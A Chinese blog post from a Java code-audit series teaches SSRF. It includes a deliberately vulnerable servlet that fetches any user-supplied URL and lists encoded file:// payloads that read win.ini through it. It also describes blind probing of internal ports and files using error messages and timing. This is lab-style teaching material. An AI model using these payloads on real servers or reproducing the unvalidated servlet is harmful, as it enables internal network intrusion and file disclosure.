java代码审计6之ssrf

最新推荐文章于 2024-03-12 21:46:15 发布
最新推荐文章于 2024-03-12 21:46:15 发布
阅读量299 收藏
点赞数
分类专栏: 代码审计 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43970718/article/details/131948083
版权

文章目录

之前的文章,
php代码审计8之SSRF

1、java支持的网络请求协议:

file ftp mailto http https jar netdoc

在jdk1.7(含)以下还支持gopher协议;

在这里插入图片描述
小结:

Java中的SSRF相比php危害会小一些

遇到ssrf尝试使用ftp://来读取一些文件

2、Java 中能发起⽹络请求的类

2.1、仅⽀持 HTTP/HTTPS 协议的类

HttpClient 					类
HttpURLConnection 			类
OkHttp 						类
Request 					类

2.2、⽀持 sun.net.www.protocol 所有协议的类

URLConnection 			类
URL 					类
ImageIO 				类

2.3、审计关键词


HttpClient.execute
HttpClient.executeMethod
HttpURLConnection.connect
HttpURLConnection.getInputStream
URL.openStream
URLConnection.getInputStream
Request.Get.execute
Request.Post.execute
ImageIO.read
OkHttpClient.newCall.execute
HttpServletRequest
BasicHttpRequest

3、靶场

3.1、漏洞代码1

package com.example.demo;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
@WebServlet("/ssrf1")
public class test extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        req.setCharacterEncoding("utf-8");
        resp.setCharacterEncoding("utf-8");
        resp.setContentType("text/html; charset=utf-8");
        String url = req.getParameter("url");
        System.out.println(url);
        StringBuffer sb = new StringBuffer();
        URL pic = new URL(url);
        URLConnection urlConnection = pic.openConnection();
        BufferedReader in = new BufferedReader(new InputStreamReader(urlConnection.getInputStream(),"UTF-8"));
        String line;
        while ((line =in.readLine())!=null){
            sb.append(line);
        }
        in.close();
        resp.getWriter().write(sb.toString());
    }
    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp
    ) throws ServletException, IOException {
        this.doGet(req,resp);
    }
}

3.2、ftp协议读取技巧

使用斜杠“\”全失败,但是编码后的“%5c”都可以成功

使用反斜杠“/”都成功,编码后的“%2f”都可以成功

不使用斜杠/反斜杠也可以成功

ssrf1?url=file:///c:\windows%5c%5cwin.ini					失败
ssrf1?url=file:///c:\\windows%5c%5cwin.ini					失败
ssrf1?url=file:///c:\\\windows%5c%5cwin.ini					失败

、、下边都成功
ssrf1?url=file:///c:%5cwindows%5c%5cwin.ini
ssrf1?url=file:///c:%5c%5cwindows%5c%5cwin.ini			
ssrf1?url=file:///c:%5c%5c%5cwindows%5c%5cwin.ini
ssrf1?url=file:///c:%5c%5c%5c%5cwindows%5c%5cwin.ini


ssrf1?url=file:///c:windows%5c%5cwin.ini						、、不加斜杠或者反斜杠


、、下边都成功,都是反斜杠“/”或者其编码的
ssrf1?url=file:///c:/windows%5c%5cwin.ini						
ssrf1?url=file:///c://windows%5c%5cwin.ini					
ssrf1?url=file:///c:///windows%5c%5cwin.ini					
ssrf1?url=file:///c:windows%5c%5cwin.ini				
ssrf1?url=file:///c:%2fwindows%5c%5cwin.ini
ssrf1?url=file:///c:%2f%2fwindows%5c%5cwin.ini
ssrf1?url=file:///c:%2f%2f%2fwindows%5c%5cwin.ini
ssrf1?url=file:///c:%2f%2f%2f%2fwindows%5c%5cwin.ini

另外在之前的任意文件读取之中,说到任意文件读取在win系统的情况下不能跨磁盘读取,
	
	比如代码在D盘就无法读取C盘的内容

但是经过测试,ssrf使用ftp协议是可以跨磁盘读取的,

这里问题应该在与“ftp协议”本身就可以读取任何磁盘内容

3.3、无回显之探测内网

ssrf无回显的情况很常见,测试思路就是使用外部平台配合,

这个基础的问题不是今天要说的,要说的是根据不同的报错来确认文件,


当访问不通的端口时,提示链接被拒绝,
	
	Connection refused: connect

在这里插入图片描述
访问通顺的端口且文件存在时,
在这里插入图片描述
当访问通顺的端口文件不存在时,
在这里插入图片描述
小结,

访问畅通的端口且文件不存在时,可能会报错,且返回时间最短

访问畅通的端口且文件存在时,没有报错,返回时间比上边差不太多(实际之中可能较难区分)

访问不畅通的端口时,可能会报错,且返回时间明显比上述长

3.4、无回显之探测文件

探测存在的文件时,一切正常,

在这里插入图片描述
探测不存在的文件时,报错
在这里插入图片描述
小结,

访问存在的文件,一切正常

访问不存在的文件,可能会返回报错,

但是以上两种请求,时间几乎一致
划水的小白白
关注
专栏目录
Java代码审计SSRF篇
大河之犬的博客
04-02 1440
SSRF(服务端请求伪造)是目前在大型站点中出现频率较高的漏洞。一般情况下,攻击者无法访问攻击目标的内网,SSRF 是攻击者访问内网的凭借之一,因为 SSRF 攻击是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统。SSRF 的漏洞原理很简单,基本上都是服务端提供了从其他服务器应用获取数据的功能且没有对目标地址和传入命令进行过滤与限制造成的,如常见的从指定 URL地址加载图片、文本资源或者获取指定页面的网页内容等。
Java代码审计ssrf基础
m0_55772907的博客
11-15 734
代码审计
java代码审计SSRF
糖小喵
05-09 1237
概述 SSRF 形成的原因大都是由于代码中提供了从其他服务器应用获取数据的功能但没有对目标地址做过滤与限 制。比如从指定 URL 链接获取图片、下载等。 漏洞示例 此处以 HttpURLConnection 为例,示例代码片段如下: String url = request.getParameter("picurl"); StringBuffer response = new StringBuffer(); URL pic = new URL(url); HttpURLConnection con
Java代码审计SSRF
网络安全从业者的学习笔记
02-27 1473
SSRF(Server-Side Request Forge, 服务端请求伪造) ,即攻击者构造恶意参数使服务端对其它内/外网系统进行访问或者攻击的一种方式。
java代码审计SSRF
qq_34778376的博客
03-11 652
漏洞描述 当Web服务器对用户提供的未经验证的目标参数发起请求时,将发生服务器端请求伪造(ssrf)。 攻击者可以构造特殊的攻击链接传给服务端执行从而利用漏洞,一般用来在外网探测或攻击内网服务。此类漏洞可能允许攻击者访问内部服务或从您的Web服务器发起攻击。 缺陷代码 def doGet(value:String) = Action { WS.url(value).get().map { response => Ok(response.body) } } 修复建议:
java代码审计-SSRF
Gefangenes的博客
06-20 421
SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定 URL 地址获取网页文本内容,加载指定地址的图片,下载等等。这里主要介绍java中和两个方法产生SSRF的原理和修复方法。
Java代码审计工程师 视频教程 下载 百度网盘链接2.zip
06-19
├─20.实验课程作业 │ 10_业务逻辑漏洞.pdf │ 11_SQL注入漏洞.pdf │ 12_文件上传&目录遍历漏洞.pdf │ 13_命令执行(代码执行).pdf ...代码审计及SDL岗位面试总结.pdf 9.XSS漏洞审计.pdf
Java代码审计工程师 视频教程 下载 百度网盘链接4.zip
最新发布
06-19
├─20.实验课程作业 │ 10_业务逻辑漏洞.pdf │ 11_SQL注入漏洞.pdf │ 12_文件上传&目录遍历漏洞.pdf │ 13_命令执行(代码执行).pdf ...代码审计及SDL岗位面试总结.pdf 9.XSS漏洞审计.pdf
完整的Java代码审计学习笔记资源(免费下载)
10-31
java代码审计-ssrf.md 第一的 4年前 java代码审计-ssti.md 第一的 4年前 java代码审计-xss.md 第一的 4年前 java代码审计-xxe.md 第一的 4年前 java代码审计-反序列化.md 添加一些关于 jndi 的内容 3年前 java代码...
Java的URL类支持的协议进行扩展的方法
写代码哟
03-26 3398
 JAVA默认提供了对file,ftp,gopher,http,https,jar,mailto,netdoc协议的支持。当我们要利用这些协议来创建应用时,主要会涉及到如下几个类:java.net.URL、java.net.URLConnection、InputStream。URL类默认支持上述协议,但是有时候我们想自定义协议,怎么办呢?Java提供了三种方法可以支持这个扩展1、URL.setUR...
Java 网络编程 —— 客户端协议处理框架
低吟不作语的博客
06-03 474
URL 类:统一资源定位符,表示客户程序要访问的远程资源URLConnection 类:表示客户程序与远程服务器的连接,客户程序可以从 URLConnection 获得数据输入流和输出流URLStreamHandler 类:协议处理器,主要负责创建与协议相关的 URLConnection 对象ContentHandler 类:内容处理器,负责解析服务器发送的数据,把它转换为相应的 Java 对象。
Java代码审计安全篇-SSRF(服务端请求伪造)漏洞
m0_63138919的博客
03-12 1955
本文章参考qax的网络安全java代码审计,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
JAVA代码审计SSRF
Jiajiazml的博客
09-23 2428
本文从漏洞原理、审计函数、漏洞危害、漏洞代码示例、实战案例、漏洞防御方式等几个方面介绍了SSRF漏洞攻击
java代码审计自学:从爬虫到SSRF漏洞
god_Zeo的安全博客
07-31 835
0x00 前提 主要是因为自己的学习Java 代码审计中的学习思路吧,主要自己一个人学习,有点闭门造车,百度学习法,但是还是记录一下,也分享一下,也便于将来的总结和反思,如果我能终能学到什么,我也会重新梳理思路,为那些自学者提供一个好的思路,所以有了下面的系列文章java代码审计自学篇。 这个是因为刚刚造轮子,学习了一下Java的GUI是怎么写的,造了一个轮子,要写一个爬虫,由于中间出现了小bug,看了看网络请求这块,后来发现顺便就是把SSRF这个漏洞就一起研究。 0x01 SSRF漏洞 SSRF(Serv
Java代码审计之路二(SSRF漏洞审计)
Love&Share
05-02 2110
SSRF Java 网络请求支持的协议,包括:http、https、file、mailto、jar、netdoc,但是相对 PHP 可以利用很多伪协议来说 Java SSRF 还是略显单调 补充: mailto:是一个用于发送邮件的 URL 协议 jar:Jar URL协议解析,协议可以用来读取 zip 格式文件(包括 jar 包)中的内容 netdoc 协议:在大部分情况下可代替 file 虽然支持多种协议,但是 JavaSSRF 利用方式比较局限,一般只用以下两种方式 利用 file 协议任
java网络学习之 自定义通讯协议(6)
xiaoliuliu2050的专栏
03-23 763
JAVA默认提供了对file,ftp,gopher,http,https,jar,mailto,netdoc协议的支持。当我们要利用这些协议来创建应用时,主要会涉及到如下几个类: 1.java.net.URL:URL资源 2.java.net.URLConnection:各种URL资源连接器 例如,当我们利用HTTP协议获取Web资源时,通常的过程如下: ...
java代码审计手书(四)
一个码农的笔记
11-29 8022
翻译自:http://find-sec-bugs.github.io/bugs.htm 翻译:聂心明 外部文件访问(Android) 漏洞特征:ANDROID_EXTERNAL_FILE_ACCESS 应用经常往外部存储上写数据(可能是SD卡),这个操作可能会有多个安全问题。首先应用可以可以通过READ_EXTERNAL_STORAGE 获取SD卡上存储的文件。而且如果数据中包含用户的敏感信息的话...
JAVA代码审计SSRF漏洞
liguangyao213的博客
02-18 2340
java代码审计系统课程--代码审计视频教程-信息安全-CSDN程序员研修院少写“漏洞” 了解常见代码安全 提升代码安全能力 代码不被黑客黑-https://edu.csdn.net/course/detail/32634 概述 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部服务器系统
SSRF 漏洞的原理以及 Java 中的处理
千里之行
01-17 3448
SSRF 漏洞的原理以及 Java 中的处理SSRF漏洞的原理有漏洞的 Java 代码示例Java 中如何避免 SSRF开源项目 SSRF漏洞的原理 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是由攻击者构造非授权的 URL, 由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 比如黑客攻击公司内部的论坛, Wiki, 工作流, 项目管理等系统. 大量的内部系统都提供内部匿名的访问方式, 不需要登陆即可以从内网访问到. 当一个
通达OA系统代码审计:XSS与SSRF漏洞及防范措施
总结来说,这份审计文档强调了在大型项目中代码审计的重要性,特别是关注XSS、SSRF和SQL注入等常见的Web应用程序安全威胁,并提供了如何识别和修复这些问题的具体示例。阅读这份文档有助于开发者理解和提升应用的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

划水的小白白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值